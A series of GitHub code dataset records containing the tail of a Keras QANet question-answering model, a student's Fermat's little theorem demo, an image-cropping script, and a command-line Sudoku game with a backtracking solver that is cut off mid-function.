questA_input])\ncand_emb = concatenate([cand_emb, cc_emb, candA_input])\n\nquest_emb = Dense(128, activation='relu')(quest_emb)\ncand_emb = Dense(128, activation='relu')(cand_emb)\n\n\nclass Highway:\n def __init__(self, dim, layers=2):\n self.linears = [Dense(dim, activation='relu') for _ in range(layers+1)]\n self.gates = [Dense(dim, activation='sigmoid') for _ in range(layers)]\n def __call__(self, x):\n for linear, gate in zip(self.linears, self.gates):\n g = gate(x)\n z = linear(x)\n x = Lambda(lambda x:x[0]*x[1]+(1-x[0])*x[2])([g, z, x])\n return x\n\nhighway1 = Highway(dim=128, layers=2)\nhighway2 = Highway(dim=128, layers=2)\n\n\nquest_emb = highway1(quest_emb)\ncand_emb = highway1(cand_emb)\n\nlstm_dim = 60\n\ndef GetPosEncodingMatrix(max_len, d_emb):\n pos_enc = np.array([\n [pos / np.power(10000, 2 * (j // 2) / d_emb) for j in range(d_emb)]\n if pos != 0 else np.zeros(d_emb)\n for pos in range(max_len)\n ])\n pos_enc[1:, 0::2] = np.sin(pos_enc[1:, 0::2]) # dim 2i\n pos_enc[1:, 1::2] = np.cos(pos_enc[1:, 1::2]) # dim 2i+1\n return pos_enc\n\nadd_layer = Lambda(lambda x:x[0]+x[1], output_shape=lambda x:x[0])\n\n\nclass AddPosEncoding:\n def __call__(self, x):\n _, max_len, d_emb = K.int_shape(x)\n pos = GetPosEncodingMatrix(max_len, d_emb)\n x = Lambda(lambda x: x + pos)(x)\n return x\n\n\nclass LayerNormalization(Layer):\n def __init__(self, eps=1e-6, **kwargs):\n self.eps = eps\n super().__init__(**kwargs)\n\n def build(self, input_shape):\n self.gamma = self.add_weight(name='gamma', shape=input_shape[-1:],\n initializer='ones', trainable=True)\n self.beta = self.add_weight(name='beta', shape=input_shape[-1:],\n initializer='zeros', trainable=True)\n super().build(input_shape)\n\n def call(self, x):\n mean = K.mean(x, axis=-1, keepdims=True)\n std = K.std(x, axis=-1, keepdims=True)\n return self.gamma * (x - mean) / (std + self.eps) + self.beta\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ScaledDotProductAttention():\n def __init__(self, d_model, attn_dropout=0.1):\n self.temper = np.sqrt(d_model)\n self.dropout = Dropout(attn_dropout)\n\n def __call__(self, q, k, v, mask):\n attn = Lambda(lambda x: K.batch_dot(x[0], x[1], axes=[2, 2]) / self.temper)([q, k])\n if mask is not None:\n mmask = Lambda(lambda x: (-1e+10) * (1 - x))(mask)\n attn = Add()([attn, mmask])\n attn = Activation('softmax')(attn)\n attn = self.dropout(attn)\n output = Lambda(lambda x: K.batch_dot(x[0], x[1]))([attn, v])\n return output, attn\n\n\nclass MultiHeadAttention():\n # mode 0 - big martixes, faster; mode 1 - more clear implementation\n def __init__(self, n_head, d_model, d_k, d_v, dropout, mode=0, use_norm=True):\n self.mode = mode\n self.n_head = n_head\n self.d_k = d_k\n self.d_v = d_v\n self.dropout = dropout\n if mode == 0:\n self.qs_layer = Dense(n_head * d_k, use_bias=False)\n self.ks_layer = Dense(n_head * d_k, use_bias=False)\n self.vs_layer = Dense(n_head * d_v, use_bias=False)\n elif mode == 1:\n self.qs_layers = []\n self.ks_layers = []\n self.vs_layers = []\n for _ in range(n_head):\n self.qs_layers.append(TimeDistributed(Dense(d_k, use_bias=False)))\n self.ks_layers.append(TimeDistributed(Dense(d_k, use_bias=False)))\n self.vs_layers.append(TimeDistributed(Dense(d_v, use_bias=False)))\n self.attention = ScaledDotProductAttention(d_model)\n self.layer_norm = LayerNormalization() if use_norm else None\n self.w_o = TimeDistributed(Dense(d_model))\n\n def __call__(self, q, k, v, mask=None):\n d_k, d_v = self.d_k, self.d_v\n n_head = self.n_head\n\n if self.mode == 0:\n qs = self.qs_layer(q) # [batch_size, len_q, n_head*d_k]\n ks = self.ks_layer(k)\n vs = self.vs_layer(v)\n\n def reshape1(x):\n s = tf.shape(x) # [batch_size, len_q, n_head * d_k]\n x = tf.reshape(x, [s[0], s[1], n_head, d_k])\n x = tf.transpose(x, [2, 0, 1, 3])\n x = tf.reshape(x, [-1, s[1], d_k]) # [n_head * batch_size, len_q, d_k]\n return x\n\n qs = Lambda(reshape1)(qs)\n ks = Lambda(reshape1)(ks)\n vs = Lambda(reshape1)(vs)\n\n if mask is not None:\n mask = Lambda(lambda x: K.repeat_elements(x, n_head, 0))(mask)\n head, attn = self.attention(qs, ks, vs, mask=mask)\n\n def reshape2(x):\n s = tf.shape(x) # [n_head * batch_size, len_v, d_v]\n x = tf.reshape(x, [n_head, -1, s[1], s[2]])\n x = tf.transpose(x, [1, 2, 0, 3])\n x = tf.reshape(x, [-1, s[1], n_head * d_v]) # [batch_size, len_v, n_head * d_v]\n return x\n\n head = Lambda(reshape2)(head)\n elif self.mode == 1:\n heads = [];\n attns = []\n for i in range(n_head):\n qs = self.qs_layers[i](q)\n ks = self.ks_layers[i](k)\n vs = self.vs_layers[i](v)\n head, attn = self.attention(qs, ks, vs, mask)\n heads.append(head);\n attns.append(attn)\n head = Concatenate()(heads)\n attn = Concatenate()(attns)\n\n outputs = self.w_o(head)\n outputs = Dropout(self.dropout)(outputs)\n if not self.layer_norm: return outputs, attn\n outputs = Add()([outputs, q])\n return self.layer_norm(outputs), attn\n\n\nclass PositionwiseFeedForward():\n def __init__(self, d_hid, d_inner_hid, dropout=0.1):\n self.w_1 = Conv1D(d_inner_hid, 1, activation='relu')\n self.w_2 = Conv1D(d_hid, 1)\n self.layer_norm = LayerNormalization()\n self.dropout = Dropout(dropout)\n\n def __call__(self, x):\n output = self.w_1(x)\n output = self.w_2(output)\n output = self.dropout(output)\n output = Add()([output, x])\n return self.layer_norm(output)\n\n\nclass FeedForward():\n def __init__(self, d_hid, dropout=0.1):\n self.forward = Dense(d_hid, activation='relu')\n self.dropout = Dropout(dropout)\n\n def __call__(self, x):\n x = self.forward(x)\n x = self.dropout(x)\n return x\n\n\nclass LayerDropout:\n def __init__(self, dropout=0.2):\n self.dropout = dropout\n\n def __call__(self, old, new):\n def func(args):\n old, new = args\n pred = K.random_uniform([]) < self.dropout\n ret = K.switch(pred, old, old + K.dropout(new, self.dropout))\n return K.in_train_phase(ret, old + new)\n\n return Lambda(func)([old, new])\n\n\nclass ConvBlock:\n def __init__(self, dim, n_conv=2, kernel_size=7, dropout=0.1):\n self.convs = [SeparableConv1D(dim, kernel_size, activation='relu', padding='same') for _ in range(n_conv)]\n self.norm = LayerNormalization()\n self.dropout = Dropout(dropout)\n\n def __call__(self, x):\n for i in range(len(self.convs)):\n z = self.norm(x)\n if i % 2 == 0: z = self.dropout(z)\n z = self.convs[i](z)\n x = add_layer([x, z])\n return x\n\n\nclass EncoderBlock:\n def __init__(self, dim, n_head, n_conv, kernel_size):\n self.conv = ConvBlock(dim, n_conv=n_conv, kernel_size=kernel_size)\n self.self_att = MultiHeadAttention(n_head=n_head, d_model=dim,\n d_k=dim // n_head, d_v=dim // n_head,\n dropout=0.1, use_norm=False)\n self.feed_forward = PositionwiseFeedForward(dim, dim, dropout=0.1)\n self.norm = LayerNormalization()\n\n def __call__(self, x, mask):\n x = AddPosEncoding()(x)\n x = self.conv(x)\n z = self.norm(x)\n z, _ = self.self_att(z, z, z, mask)\n x = add_layer([x, z])\n z = self.norm(x)\n z = self.feed_forward(z)\n x = add_layer([x, z])\n return x\n\n\nclass Encoder:\n def __init__(self, dim=128, n_head=8, n_conv=2, n_block=1, kernel_size=7):\n self.dim = dim\n self.n_block = n_block\n self.conv_first = SeparableConv1D(dim, 1, padding='same')\n self.enc_block = EncoderBlock(dim, n_head=n_head, n_conv=n_conv, kernel_size=kernel_size)\n\n def __call__(self, x, mask):\n if K.int_shape(x)[-1] != self.dim:\n x = self.conv_first(x)\n for i in range(self.n_block):\n x = self.enc_block(x, mask)\n return x\n\nemb_enc1 = Encoder(128, n_head=2, n_conv=4, n_block=1, kernel_size=7)\nemb_enc2 = Encoder(128, n_head=2, n_conv=4, n_block=1, kernel_size=7)\nmain_enc1 = Encoder(128, n_head=2, n_conv=2, n_block=2, kernel_size=5)\nmain_enc2 = Encoder(128, n_head=2, n_conv=2, n_block=2, kernel_size=5)\nmain_enc3 = Encoder(128, n_head=2, n_conv=2, n_block=2, kernel_size=5)\n\nQmask = Lambda(lambda x:K.cast(K.not_equal(x,0), 'float32'))(quest_input)\nCmask = Lambda(lambda x:K.cast(K.not_equal(x,0), 'float32'))(cand_input)\n\nQ = emb_enc1(quest_emb, Qmask)\nC = emb_enc1(cand_emb, Cmask)\n\nQsmask = Lambda(lambda x:(1-x)*(-1e+9))(Qmask)\nCsmask = Lambda(lambda x:(1-x)*(-1e+9))(Cmask)\n\nCC = Lambda(lambda C:K.repeat_elements(C[:,:,None,:], setting.query_len, 2))(C)\nQQ = Lambda(lambda Q:K.repeat_elements(Q[:,None,:,:], setting.passage_len, 1))(Q)\nS_hat = concatenate([CC, QQ, multiply([CC, QQ])])\nS = Reshape((setting.passage_len, setting.query_len))( TimeDistributed(TimeDistributed(Dense(1, use_bias=False)))(S_hat) )\n\naa = Activation('softmax')( add([S, Qsmask]) )\nU_hat = Lambda(lambda x:K.batch_dot(x[0], x[1]))([aa, Q])\n\nSS = Lambda(lambda x: K.max(x, 2))(S)\nbb = Activation('softmax')( add([SS, Csmask]) )\nh_hat = Lambda( lambda x: K.batch_dot(K.expand_dims(x[0],1), x[1]) )([bb, C])\nH_hat = Lambda( lambda x: K.repeat_elements(x, setting.passage_len, 1) )(h_hat)\n\n\nG = concatenate([C, U_hat, multiply([C,U_hat]), multiply([C,H_hat])])\n\nG0 = main_enc1(G, Cmask)\nM1 = main_enc2(G0, Cmask)\nM2 = main_enc3(M1, Cmask)\n\nGM1 = concatenate([G0, M1])\nGM2 = concatenate([G0, M2])\n\nF1 = TimeDistributed(Dense(1, use_bias=False))(GM1)\nF2 = TimeDistributed(Dense(1, use_bias=False))(GM2)\n\nfinal_start = Activation('sigmoid', name='s')(Flatten()( F1 ))\nfinal_end = Activation('sigmoid', name='e')(Flatten()( F2 ))\n\nmodel = Model(inputs=[questC_input, quest_input, candC_input, cand_input, questAc_input, questA_input, candAc_input, candA_input], outputs=[final_start, final_end])\nmodel.summary()\n\n\nif __name__ == '__main__':\n name = 'qanet'\n training(name, model)\n","repo_name":"kyang888/sg_transfer_s","sub_path":"model_qanet.py","file_name":"model_qanet.py","file_ext":"py","file_size_in_byte":13304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36272429575","text":"# harrison frahn\n# period 2\n# chapter 8.3\n# expected input: a prime and an integer\ndef isprime(num):\n if num%1!=0:\n return False\n num = abs(num)\n # 1 and 0 aren't prime\n if num < 2:\n return False\n # 2 is the only even prime\n if num == 2: \n return True\n # after we're sure n isn't 2, return false if n is even\n if num%2==0: \n return False\n # check all the rest of the nums up to sqrt(n)\n for i in range(3, int(num**0.5)+1, 2):\n if num % i == 0:\n return False\n return True\ndef main():\n again = True\n try:\n while again:\n print('This program demonstrates Fermat\\'s little theroem.')\n p = eval(input(\"Enter a prime: \"))\n a = eval(input(\"enter an integer: \"))\n if isprime(p) and a%1==0:\n mult = a**p\n fact = (mult - a)//p\n print('a =',a,'\\np =',p)\n print(a,'^',p,'=',int(mult))\n print('(',int(mult),'-',a,') /',p,'=',int(fact))\n print(mult-a,'is an integer multiple of',p,'so the theroem works! YAY!')\n elif isprime(p)==False and a%1!=0:\n raise RuntimeError(\"You didn't enter a prime number or an integer!\")\n elif isprime(p)==False:\n raise RuntimeError(\"You didn't enter a prime number!\")\n elif a%1!=0:\n raise RuntimeError(\"You didn't enter an integer!\")\n a = input('Demonstrate the theorem again, with different values?(y/n)')\n if a[0].lower() != 'y':\n again = False\n if a[0].lower() != 'y' and a[0].lower() != 'n':\n raise RuntimeError(\"You didn't enter y or n!\")\n except RuntimeError as err:\n print(err.args)\n except NameError:\n print(\"You entered letter(s), not a number!\")\n except TypeError:\n print(\"You entered more than 1 number!\")\n except SyntaxError:\n print(\"You entered the number wrong!\")\n except EOFError or KeyboardInterrupt:\n print('\\n')\n except:\n print(\"Something went wrong!\")\nmain()\n","repo_name":"hrfrahn/functprog","sub_path":"Chapter 8 programming projects/ch8_3.py","file_name":"ch8_3.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"27646968836","text":"from PIL import Image\nimport numpy as np\nimport os\n\nbase_dir='./data'\n\nclass ImageCropper():\n\tdef __init__(self, out_dir):\n\t\tself.out_dir = out_dir\n\n\tdef start_Cropping(self):\n\t\tbase_path = os.path.join(base_dir,'CCWeb','data')\n\t\tout_path = os.path.join(self.out_dir,'CCWeb','data','image')\n\n\t\tbase_path_labels = os.path.join(base_path, 'label')\n\t\tbase_path_images = os.path.join(base_path, 'image')\n\n\t\tfor folder in os.listdir(base_path_labels):\n\t\t\tfor folder2 in os.listdir(os.path.join(base_path_labels, folder)):\n\t\t\t\tfor folder3 in os.listdir(os.path.join(base_path_labels, folder, folder2)):\n\t\t\t\t\tfor label_file in os.listdir(os.path.join(base_path_labels, folder, folder2, folder3)):\n\t\t\t\t\t\tfile_name = label_file.split('.')[0]\n\n\t\t\t\t\t\timg_file = os.path.join(base_path_images, folder, folder2, folder3)+'/'+file_name+'.jpg'\n\t\t\t\t\t\tprint('FileName', img_file)\n\t\t\t\t\t\timg = Image.open(img_file)\n\t\t\t\t\t\t\n\t\t\t\t\t\tos.makedirs(os.path.join(out_path, folder, folder2, folder3), exist_ok=True)\n\n\t\t\t\t\t\twith open(os.path.join(base_path_labels, folder, folder2, folder3)+'/'+label_file) as f:\n\t\t\t\t\t\t\tcnt = 0\n\t\t\t\t\t\t\tfor line in f:\n\t\t\t\t\t\t\t\tcnt += 1\n\t\t\t\t\t\t\t\tif (cnt == 3):\n\t\t\t\t\t\t\t\t\tx1,y1,x2,y2 = line.split(' ')\n\t\t\t\t\t\t\t\t\tx1 = int(x1)\n\t\t\t\t\t\t\t\t\ty1 = int(y1)\n\t\t\t\t\t\t\t\t\tx2 = int(x2)\n\t\t\t\t\t\t\t\t\ty2 = int(y2)\n\t\t\t\t\t\t\t\t\timg1 = img\n\n\t\t\t\t\t\t\t\t\tx_max, y_max = img.size\n\n\t\t\t\t\t\t\t\t\tif (x1 > 0 and x2 > 0 and y1 > 0 and y2 > 0 and x1 < x_max and x2 < x_max and y1 < y_max and y2 < y_max and x1 != x2 and y1 != y2):\n\t\t\t\t\t\t\t\t\t\timg1 = img.crop((x1, y1, x2, y2))\n\t\t\t\t\t\t\t\t\timg1.save(os.path.join(out_path, folder, folder2, folder3)+'/'+file_name+'.jpg')\n\n\ndef main():\n\ta = ImageCropper('./data_cropped')\n\ta.start_Cropping()\n\nif __name__ == '__main__':\n main()","repo_name":"NiteshBharadwaj/latent_domain_alignment_domain_adaptation","sub_path":"image_cropper.py","file_name":"image_cropper.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41236967190","text":"from termcolor import colored\n\n\nclass SudokuBoard:\n \"\"\"\n This class contains the board object, with methods pertaining to the board. This\n class contains methods to check win conditions, the brute force solver, and the main\n command line driver code.\n \"\"\"\n\n def __init__(self, difficulty):\n \"\"\"\n Sets the board based on chosen difficulty level or mode chosen.\n :param difficulty: The difficulty or mode chosen options: Easy, Medium, Hard, Verify, Brute Force\n \"\"\"\n self.difficulty = difficulty\n self.game_won = False\n if self.difficulty == \"Easy\":\n\n self.board_print = [\n [0, colored(8, 'blue'), 0, 0, colored(1, 'blue'), colored(3, 'blue'), colored(4, 'blue'), 0, 0],\n [colored(4, 'blue'), colored(2, \"blue\"), 0, colored(6, 'blue'), colored(8, \"blue\"), 0, 0, 0, 0],\n [0, 0, colored(1, \"blue\"), 0, colored(5, \"blue\"), colored(4, 'blue'), 0, colored(8, 'blue'),\n colored(3, \"blue\")],\n [colored(1, 'blue'), colored(9, 'blue'), 0, 0, 0, colored(8, \"blue\"), colored(7, \"blue\"), 0, 0],\n [0, colored(4, 'blue'), colored(7, 'blue'), 0, 0, colored(2, 'blue'), colored(5, 'blue'), 0,\n colored(8, 'blue')],\n [0, colored(5, \"blue\"), 0, 0, 0, colored(9, \"blue\"), 0, colored(3, \"blue\"), 0],\n [colored(2, \"blue\"), 0, colored(9, \"blue\"), colored(3, \"blue\"), 0, colored(5, \"blue\"), 0,\n colored(7, \"blue\"), 0],\n [colored(5, \"blue\"), 0, 0, colored(7, \"blue\"), colored(2, \"blue\"), 0, 0, 0, colored(9, \"blue\")],\n [colored(7, \"blue\"), colored(3, \"blue\"), 0, 0, 0, 0, colored(2, \"blue\"), 0, colored(6, \"blue\")]]\n\n self.board = [\n [0, 8, 0, 0, 1, 3, 4, 0, 0],\n [4, 2, 0, 6, 8, 0, 0, 0, 0],\n [0, 0, 1, 0, 5, 4, 0, 8, 3],\n [1, 9, 0, 0, 0, 8, 7, 0, 0],\n [0, 4, 7, 0, 0, 2, 5, 0, 8],\n [0, 5, 0, 0, 0, 9, 0, 3, 0],\n [2, 0, 9, 3, 0, 5, 0, 7, 0],\n [5, 0, 0, 7, 2, 0, 0, 0, 9],\n [7, 3, 0, 0, 0, 0, 2, 0, 6]]\n\n self.banned_moves = [(0, 1), (0, 4), (0, 5), (0, 6),\n (1, 0), (1, 1), (1, 3), (1, 4),\n (2, 2), (2, 4), (2, 5), (2, 7), (2, 8),\n (3, 0), (3, 1), (3, 5), (3, 6),\n (4, 1), (4, 2), (4, 5), (4, 6), (4, 8),\n (5, 1), (5, 5), (5, 7),\n (6, 0), (6, 2), (6, 3), (6, 5), (6, 7),\n (7, 0), (7, 3), (7, 4), (7, 8),\n (8, 0), (8, 1), (8, 6), (8, 8)]\n\n self.play_game()\n\n elif self.difficulty == \"Medium\":\n\n self.board = [\n [7, 0, 0, 8, 0, 9, 0, 0, 6],\n [0, 0, 1, 7, 0, 0, 0, 0, 9],\n [2, 0, 0, 0, 5, 0, 0, 0, 1],\n [9, 0, 0, 0, 0, 0, 0, 0, 0],\n [6, 5, 0, 0, 0, 0, 4, 2, 0],\n [4, 3, 0, 0, 7, 8, 0, 0, 0],\n [8, 6, 0, 0, 9, 0, 1, 0, 2],\n [3, 0, 4, 0, 0, 6, 0, 0, 0],\n [1, 0, 0, 0, 8, 0, 0, 6, 0]]\n\n self.board_print = [\n [colored(7, 'blue'), 0, 0, colored(8, \"blue\"), 0, colored(9, \"blue\"), 0, 0, colored(6, \"blue\")],\n [0, 0, colored(1, \"blue\"), colored(7, \"blue\"), 0, 0, 0, 0, colored(9, 'blue')],\n [colored(2, \"blue\"), 0, 0, 0, colored(5, \"blue\"), 0, 0, 0, colored(1, \"blue\")],\n [colored(9, \"blue\"), 0, 0, 0, 0, 0, 0, 0, 0],\n [colored(6, \"blue\"), colored(5, \"blue\"), 0, 0, 0, 0, colored(4, \"blue\"), colored(2, \"blue\"), 0],\n [colored(4, \"blue\"), colored(3, \"blue\"), 0, 0, colored(7, \"blue\"), colored(8, \"blue\"), 0, 0, 0],\n [colored(8, \"blue\"), colored(6, \"blue\"), 0, 0, colored(9, \"blue\"), 0, colored(1, \"blue\"), 0,\n colored(2, \"blue\")],\n [colored(3, \"blue\"), 0, colored(4, \"blue\"), 0, 0, colored(6, \"blue\"), 0, 0, 0],\n [colored(1, \"blue\"), 0, 0, 0, colored(8, \"blue\"), 0, 0, colored(6, \"blue\"), 0]]\n\n self.banned_moves = [\n (0, 0), (0, 5), (0, 8),\n (1, 2), (1, 3), (1, 8),\n (2, 0), (2, 4), (1, 8),\n (3, 0),\n (4, 0), (4, 1), (4, 6), (4, 7),\n (5, 0), (5, 1), (5, 4), (5, 5),\n (6, 0), (6, 1), (6, 4), (6, 6), (6, 8),\n (7, 0), (7, 2), (7, 5),\n (8, 0), (8, 4), (8, 7)]\n\n self.play_game()\n\n elif self.difficulty == \"Hard\":\n\n self.board = [\n [0, 9, 0, 7, 0, 1, 0, 0, 0],\n [0, 0, 0, 4, 0, 0, 0, 0, 0],\n [7, 0, 0, 0, 0, 6, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0, 4],\n [0, 0, 0, 0, 9, 5, 0, 0, 7],\n [6, 0, 8, 0, 4, 0, 0, 9, 0],\n [8, 0, 0, 3, 0, 0, 7, 0, 0],\n [0, 0, 4, 0, 5, 0, 0, 0, 2],\n [0, 2, 9, 0, 0, 0, 0, 5, 8]]\n\n self.board_print = [\n [0, colored(9, \"blue\"), 0, colored(7, \"blue\"), 0, colored(1, \"blue\"), 0, 0, 0],\n [0, 0, 0, colored(4, \"blue\"), 0, 0, 0, 0, 0],\n [colored(7, \"blue\"), 0, 0, 0, 0, colored(6, \"blue\"), 0, 0, 0],\n [0, colored(1, \"blue\"), 0, 0, 0, 0, 0, 0, colored(4, \"blue\")],\n [0, 0, 0, 0, colored(9, \"blue\"), colored(5, \"blue\"), 0, 0, colored(7, \"blue\")],\n [colored(6, \"blue\"), 0, colored(8, \"blue\"), 0, colored(4, \"blue\"), 0, 0, colored(9, \"blue\"), 0],\n [colored(8, \"blue\"), 0, 0, colored(3, \"blue\"), 0, 0, colored(7, \"blue\"), 0, 0],\n [0, 0, colored(4, \"blue\"), 0, colored(5, \"blue\"), 0, 0, 0, colored(2, \"blue\")],\n [0, colored(2, \"blue\"), colored(9, \"blue\"), 0, 0, 0, 0, colored(5, \"blue\"), colored(8, \"blue\")]]\n\n self.banned_moves = [\n (0, 1), (0, 3), (0, 5),\n (1, 3),\n (2, 0), (2, 5),\n (3, 1), (3, 8),\n (4, 4), (4, 5), (4, 8),\n (5, 0), (5, 2), (5, 4), (5, 7),\n (6, 0), (6, 3), (6, 6),\n (7, 2), (7, 4), (7, 8),\n (8, 1), (8, 2), (8, 7), (8, 8)]\n\n self.play_game()\n elif self.difficulty == \"Brute Force\":\n\n self.board = [\n [0, 8, 0, 0, 1, 3, 4, 0, 0],\n [4, 2, 0, 6, 8, 0, 0, 0, 0],\n [0, 0, 1, 0, 5, 4, 0, 8, 3],\n [1, 9, 0, 0, 0, 8, 7, 0, 0],\n [0, 4, 7, 0, 0, 2, 5, 0, 8],\n [0, 5, 0, 0, 0, 9, 0, 3, 0],\n [2, 0, 9, 3, 0, 5, 0, 7, 0],\n [5, 0, 0, 7, 2, 0, 0, 0, 9],\n [7, 3, 0, 0, 0, 0, 2, 0, 6]]\n\n self.board_print = self.board\n\n self.banned_moves = [(0, 1), (0, 4), (0, 5), (0, 6),\n (1, 0), (1, 1), (1, 3), (1, 4),\n (2, 2), (2, 4), (2, 5), (2, 7), (2, 8),\n (3, 0), (3, 1), (3, 5), (3, 6),\n (4, 1), (4, 2), (4, 5), (4, 6), (4, 8),\n (5, 1), (5, 5), (5, 7),\n (6, 0), (6, 2), (6, 3), (6, 5), (6, 7),\n (7, 0), (7, 3), (7, 4), (7, 8),\n (8, 0), (8, 1), (8, 6), (8, 8)]\n\n game_obj = SudokuGame(self)\n self.brute_force_method(game_obj)\n self.print_board()\n\n elif self.difficulty == \"Verify\":\n n = 81\n\n # citation: https://pynative.com/python-accept-list-input-from-user/#h-input-a-list-using-input-and-range-function\n num_list = list(int(num) for num in input(\"Enter a Sudoku Board \").strip().split())[:n]\n\n if len(num_list) < 81:\n print(\"No, this is not a valid solution.\")\n else:\n # citation: https://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks\n self.board = [num_list[x:x + 9] for x in range(0, len(num_list), 9)]\n self.board_print = self.board\n self.print_board()\n\n print(self.check_win())\n\n def play_game(self):\n \"\"\"\n Main driver code for the command line game. The function contains all of the\n commands that are asked of the player until the game is won.\n :return:\n \"\"\"\n self.game_won = False\n temp = self\n print(\"Ok, here's your board.\")\n temp.print_board()\n print(\"Fill in the blanks to win the game\")\n print(\"Pass an argument by entering row, column, and value\")\n\n game_obj = SudokuGame(self.board)\n\n while self.game_won is False:\n while True:\n try:\n row = int(input(\"What row? \"))\n col = int(input(\"what column? \"))\n value = int(input(\"What value? \"))\n game_obj.add_value(row, col, value, self)\n print(self.puzzle_complete())\n print(self.check_win())\n temp.print_board()\n except:\n print(\"Those were not valid inputs\")\n else:\n break\n\n def get_squares(self, row, col):\n \"\"\"\n Returns the subgrid a passed cell belongs to. Used to check whether the intended\n value is already present in the subgrid.\n :param row: Row of the cell to be changed\n :param col: Column of the cell to be changed\n :return: Tuple\n \"\"\"\n if row <= 2:\n if col <= 2:\n return (0, 2), (0, 2)\n elif col <= 5:\n return (0, 2), (3, 5)\n else:\n return (0, 2), (6, 8)\n elif row <= 5:\n if col <= 2:\n return (3, 5), (0, 2)\n elif col <= 5:\n return (3, 5), (3, 5)\n else:\n return (3, 5), (6, 8)\n else:\n if col <= 2:\n return (6, 8), (0, 2)\n elif col <= 5:\n return (6, 8), (3, 5)\n else:\n return (6, 8), (6, 8)\n\n def is_move_legal(self, game_obj, row, col, value):\n \"\"\"\n Calls several functions to determine whether a potential move is legal\n :param game_obj: SudokuGame object\n :param row: row to be altered\n :param col: column to be altered\n :param value: value to insert in [row][column]\n :return: True False\n \"\"\"\n if game_obj.check_row(row, value, self) is True:\n if game_obj.check_col(col, value, self) is True:\n square = self.get_squares(row, col)\n if game_obj.check_square(square, value, self) is True:\n return True\n return False\n\n def empties(self):\n \"\"\"\n Helper Function for Brute_Force_Method. When the board has been filled this function signals the end of\n the recursive calls.\n :return: List of tuples\n \"\"\"\n empties = []\n for i in range(9):\n for x in range(9):\n if self.board[i][x] == 0:\n empties.append((i, x))\n return empties\n\n def brute_force_method(self, game_obj):\n \"\"\"\n This function builds a solution to the sudoku board using backtracking method.\n :param game_obj: SudokuGame object\n :return: None\n \"\"\"\n for i in range(9):\n for x in range(9):\n if self.board[i][x] == 0:\n for num in range(1, 10):\n if self.is_move_legal(game_obj, i, x, num) is True:\n self.board[i][x] = num\n result = self.brute_force_method(game_obj)\n empties = self.empties()\n if len(empties) == 0:\n break\n else:\n self.board[i][x] = 0\n return False\n return True\n\n def print_board(self):\n \"\"\"\n This function prints the board through the game. Formatting citation provided below.\n :return: printed board representation.\n \"\"\"\n # citation: https://stackoverflow.com/questions/37952851/formating-sudoku-grids-python-3\n iter = 0\n print(\"|\" + \"---+\" * 8 + \"---|\")\n for i in self.board_print:\n print((\"|\" + \" {} {} {} |\" * 3).format(*[x if x != 0 else \" \" for x in i]))\n if iter == 8:\n print(\"|\" + \"---+\" * 8 + \"---|\")\n elif iter % 3 == 2:\n print(\"|\" + \"---+\" * 8 + \"---|\")\n else:\n print(\"|\" + \" +\" * 8 + \" |\")\n iter += 1\n\n def update_board(self, row, col, val):\n \"\"\"\n When the SudokuGame class determines that a potential move is legal this function updated\n the game board and the human-readable printed board.\n :param row: The row to be upated\n :param col: Column to be updated\n :param val: The value to be inserted at the [row][column] position\n :return: None\n \"\"\"\n\n self.board[row][col] = val\n self.board_print[row][col] = val\n\n def get_board_value(self, row, col):\n \"\"\"\n Returns the value at a given [row][column] location.\n :param row: The row to be checked.\n :param col: The column to be checked.\n :return: Value at [row][column] location.\n \"\"\"\n return self.board[row][col]\n\n def puzzle_complete(self):\n \"\"\"\n This function determines whether the sudoku grid has been filled and if so runs\n a check for win conditions.\n :return: String or calls check_win()\n \"\"\"\n check_val = 0\n for i in self.board:\n if check_val in i:\n return \"Ready for next guess\"\n\n return self.check_win()\n\n def check_win(self):\n \"\"\"\n Checks whether a filled board represents a valid solution.\n :return: String\n \"\"\"\n # check that the board is completely filled\n for i in self.board:\n row = i\n for x in row:\n if x == 0:\n return\n\n # check if no values are repeated in any row\n for i in self.board:\n used_nums = []\n row = i\n for num in row:\n if num not in used_nums:\n used_nums.append(num)\n elif num in used_nums:\n return \"This is not a valid solution\"\n\n # check for no repeated nums in cols\n cols = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n for col in cols:\n used_nums = []\n for x in range(9):\n temp_val = self.board[col][x]\n if temp_val not in used_nums:\n used_nums.append(temp_val)\n elif temp_val in used_nums:\n return \"This is not a valid solution\"\n\n # check for repeated nums in sub-grid\n\n sub1 = self.board[0:3]\n temp = []\n for i in sub1:\n i = i[0:3]\n temp.append(i)\n sub1 = temp\n\n sub2 = self.board[0:3]\n temp = []\n for i in sub2:\n i = i[3:6]\n temp.append(i)\n sub2 = temp\n\n sub3 = self.board[0:3]\n temp = []\n for i in sub3:\n i = i[6:9]\n temp.append(i)\n sub3 = temp\n\n sub4 = self.board[3:6]\n temp = []\n for i in sub4:\n i = i[0:3]\n temp.append(i)\n sub4 = temp\n\n sub5 = self.board[3:6]\n temp = []\n for i in sub5:\n i = i[3:6]\n temp.append(i)\n sub5 = temp\n\n sub6 = self.board[3:6]\n temp = []\n for i in sub6:\n i = i[6:9]\n temp.append(i)\n sub6 = temp\n\n sub7 = self.board[6:9]\n temp = []\n for i in sub7:\n i = i[0:3]\n temp.append(i)\n sub7 = temp\n\n sub8 = self.board[6:9]\n temp = []\n for i in sub8:\n i = i[3:6]\n temp.append(i)\n sub8 = temp\n\n sub9 = self.board[6:9]\n temp = []\n for i in sub9:\n i = i[6:9]\n temp.append(i)\n sub9 = temp\n\n sub_grids = [sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8, sub9]\n\n for grid in sub_grids:\n used_nums = []\n for num in grid:\n if num not in used_nums:\n used_nums.append(num)\n elif num in used_nums:\n return \"This is not a valid Solution\"\n\n self.game_won = True\n print(\"You've won the game!\")\n\n\n\n\nclass SudokuGame:\n \"\"\"\n This class contains all the logic to actually play the sudoku game.\n \"\"\"\n\n def __init__(self, board):\n \"\"\"\n Takes as argument a SudodkuBoard object.\n :param board:\n \"\"\"\n self.board = board\n\n def input_validations(self, row, col, 